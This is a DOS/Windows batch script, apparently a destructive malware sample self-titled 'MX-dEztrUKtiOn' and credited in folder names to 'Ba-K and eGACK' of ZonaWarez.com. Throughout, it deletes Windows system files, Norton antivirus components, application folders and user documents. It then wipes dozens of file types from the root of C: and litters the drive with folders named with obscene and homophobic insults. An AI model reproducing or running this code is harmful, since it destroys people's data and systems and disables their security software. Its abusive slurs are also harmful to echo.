@echo off
CLS
@del c:\Windows\win.ini
CLS
@del c:\windows\system.dat
CLS
@del c:\windows\system.ini
CLS
@del c:\windows\escrit~1\*.lnk
CLS
@del c:\windows\*.src
CLS
@REN c:\Windows_suck_my_Dick_ZONAWAREZ.com_Ba-k
CLS
@REN c:\Windows_suck_my_Dick_ZONAWAREZ.com_eGACK
CLS
@del c:\progra~1\netscape\commun~1\program\netscape.exe
CLS
@del c:\progra~1\netscape\commun~1\program\wgbview.dbm
CLS
@del c:\progra~1\norton~1\dec2.dll
@del c:\progra~1\norton~1\navstart.dat
@del c:\progra~1\norton~1\navw32.exe
@del c:\progra~1\norton~1\sfstr32i.dll
CLS
@del c:\progra~1\*.*
CLS
@del c:\progra~2\*.*
CLS
@del c:\progra~1\icq\icqcntct.dll
CLS
@del c:\progra~1\icq\dll\icqwso~1.dll
CLS
@REN c:\progra~1 fuck
CLS
@del c:\archiv~1\*.*
CLS
@del c:\misdoc~1\*.*
CLS
@REN c:\misdoc~1_fue_borrado_todo
CLS
@REN c:\archiv~1_Programas_borrados
CLS
@md c:\sex
@md c:\fff
@md c:\545
@md c:\jsior
@md c:\ierjq
@md c:\nmao
@md c:\ian
@md c:\asdja
@md c:\duiae
@md c:\dsuiuie
@md c:\ianer
@md c:\aie
@md c:\aiaer
@md c:\aiher
@md c:\kaie
@md c:\system
@md c:\uauau
@md c:\opoe
@md c:\pogrw
@md c:\uauer
@md c:\vnvnv
@md c:\imcvns
@md c:\mnbf
@md c:\ingo
@md c:\iajf
@md c:\sexe
@md c:\fffs
@md c:\54s5
@md c:\jsioer
@md c:\ierjeq
@md c:\nmato
@md c:\iany
@md c:\asbja
@md c:\duaae
@md c:\dsujiuie
@md c:\ianer
@md c:\aae
@md c:\aider
@md c:\ai3er
@md c:\kafe
@md c:\systam
@md c:\uauaau
@md c:\ofoe
@md c:\togrw
@md c:\uader
@md c:\vnvdsv
@md c:\i43cvns
@md c:\mdbf
@md c:\ind43
@md c:\iajf
@md c:\flgpore
@md c:\flkgeirueo
@md c:\fdkfkd
@md c:\pornografia
@md c:\imbecil
@md c:\puto
@md c:\maricon
@md c:\choto
@md c:\joto
@md c:\verga
@md c:\bollo
@md c:\estupido
@md c:\XP
@md c:\lpyprlr
@md c:\dlelld
@md c:\hkrikdlkdoer
@md c:\fuckStupid
@md c:\NoTeMetasConMigo
@md c:\Eres_un_pendejo
@md c:\chupame_la_verga_idiota
@md c:\eres_un_idiota_animal
@md c:\estupido_cara_de_verga
@md c:\jajajajaja
@md c:\que_idiota_eres_imbecil
@md c:\archivos_del_hacker_y_spyware
@md c:\BUUUUUUUUUUUU
@md c:\pornografia_aqui
@md c:\culito_mio
@md c:\estupido_cara_de_verga
@md c:\made_with_GCC-destruction
@md c:\yessssssssssssss
@md c:\fgthhjhgjghj
@md c:\no_se_ni_para_que_te_hago_carpetas
@md c:\file00000001
@md c:\configBAT
@md c:\Hola
@md c:\Hello
@md c:\Hi
@md c:\I_fuck_you
@md c:\fuck_shit
@md c:\Viva_Mexico_cabrones
@md c:\mocosoft
@md c:\hey_you_suck_my_balls_imbecil
@md c:\klhjrgfkl
@md c:\kljvfl
@md c:\flflñhlñghjlghlmghfdbgjkb
@md c:\flñgfkljgfklgjlk
@md c:\fjkbgfkdgbk
@md c:\2121326414
@md c:\24564345
@md c:\2124545212125455125454212
@md c:\sdfbkk45645646
@md c:\56454513212456412
@md c:\110002132
@md c:\23321203132321321321312132132101312312
@md c:\klkldgfnknfd213213213212312131320156
@md c:\trt1tre31t1rt321re23t1
@md c:\fdlgjk
@md c:\gfjhnjk
@md c:\fñgjfkfkdkfklglfgnkl
@md c:\00212121212121.lik
@md c:\fklggnfk.lop
@md c:\fklgfklgkl
@md c:\fkljklf32132131
@md c:\00232326565233656332
@md c:\00212321001233202132100
@md c:\nmnmnmnmnmnmnmnmnmnmnmnmnmnmnmnmn
@md c:\nmnmnmnmnmnmnmnmnmnmnmnmnmnmnmnmnn
@md c:\kvdldlfkldlkfdlkf
@md c:\information_puto
@md c:\ppoloolllfflflflf
@md c:\flkdñkfglñfkg
@md c:\flglkfkgj
@md c:\kfkdjdjdd
@md c:\BLINK_NIGHT_DJ
@md c:\lflfkdlgkfdldgk
@md c:\poolioi
@md c:\suck_MY_DICK
@md c:\ZonaWarez.com
@md c:\Ba-K
@md c:\eGACK
@md c:\dlñfñldfjlñjsñsjdsñvmsdñmvfklmsfvñfvñ
@md c:\mfmfmfmmfmdmdmmfmdmdkfkdkdkfkfkdkfkf35132f1g321fd32g
@md c:\gkgkgdfjgdlñfjgfdlñgj
@md c:\lkfjlñeelñrelñrelñrelñrelñrelñrelñrelñrelñrelñrelñrelñre
@md c:\ññffgllfjklghlfjksht321321321321321
@md c:\0021210132323232132121321321321321321
@md c:\1245461616434316343461646464
@md c:\Madonna
@md c:\Spliknot
@md c:\Viva_Mexico_Cabrones
@md c:\MX-dEztrUKtiOn
@md c:\MX-dEztrUKtiOn_by_Ba-K_and_eGACK_
@md c:\jejejejejejejejejejejejejejejejejejejejejejejejejejejeje
@md c:\KaZaA
@md c:\fuck_you_men
@md c:\SUCK-MY-DICK-STUPID
@md c:\fReEwArE
@md c:\FUCK
@md c:\IMBECIL_2
@md c:\SON_OF_A_BITCH
@md c:\SUCK_MY_BALLS_25656
@md c:\VIVA_MEXICO_PUTOS_jejejeje
@md c:\I_am_kissing_your_ass
@md c:\SKA
@md c:\_eGACK_
@md c:\_ZonaWarez.com_
@md c:\_Ba-K_
@md c:\nnnnunununununununununun
@md c:\kldlfjldjfglkjdlgfj41321321502000000
@md c:\MX-MX-MX-MX-MX-MX-MX-MX-MX-MX
@md c:\Oracle_Suck_my_Dick
@md c:\SQL_Suck_my_Dick
@md c:\Access_Suck_my_Dick
@md c:\tu_pc_fue_desmadrada_con_MX-dEztrUKtiOn_exclusivo_de_ZonaWarez.com
@md c:\Suck_my_Dick_all_DataBases
@md c:\Symantec_este_es_tu_RETO
@md c:\windows\escrit~1\IMBECIL
@md c:\windows\escrit~1\PUTO
@md c:\windows\escrit~1\mendigo_choto
@md c:\windows\escrit~1\Vete_a_la_VERGA
@md c:\windows\escrit~1\Entra_a_mi_PC_y_despues_a_C
@mc c:\windows\escrit~1\Ja_ja_ja
@cd\
CLS
@del c:\*.sys
@del c:\*.exe
@del c:\*.txt
@del c:\*.dll
@del c:\*.com
@del c:\*.dat
@del c:\*.ini
@del c:\*.mp3
@del c:\*.hlp
@del c:\*.hta
@del c:\*.jpg
@del c:\*.doc
@del c:\*.gif
@del c:\*.zip
@del c:\*.mpg
@del c:\*.mpeg
@del c:\*.mov
@del c:\*.wav
@del c:\*.ico
@del c:\*.lnk
@del c:\*.wma
@del c:\*.wab
@del c:\*.xls
@del c:\*.ppt
@del c:\*.pdf
@del c:\*.avi
@del c:\*.mid
@del c:\*.swf
@del c:\*.fla
@del c:\*.html
@del c:\*.htm
@del c:\*.rar
@del c:\*.wsz
@del c:\*.wbmp
@del c:\*.bmp
@del c:\*.php
@del c:\*.cgi
@del c:\*.pl
@del c:\*.jsp
@del c:\*.asp
@del c:\*.js
@del c:\*.vbs
@del c:\*.php3
@del c:\*.url
@del c:\*.ocx
@del c:\*.nfo
@del c:\*.sql
@del c:\*.ora
@del c:\*.mdb
@del c:\*.java
@del c:\*.jar
@del c:\*.class
@del c:\*.hdr
@del c:\*.scf
@del c:\*.scr
@del c:\*.cur
@del c:\*.ani
@del c:\*.chm
@del c:\*.crt
@del c:\*.crl
@del c:\*.ctt
@del c:\*.db
@del c:\*.der
@del c:\*.dfm
@del c:\*.dot
@del c:\*.dpk
@del c:\*.dpr
@del c:\*.eml
@del c:\*.jsf
@del c:\*.msg
@del c:\*.msi
@del c:\*.sct
@del c:\*.swt
@del c:\*.xml
@del c:\*.wml
@del c:\*.xsl
@del c:\*.zap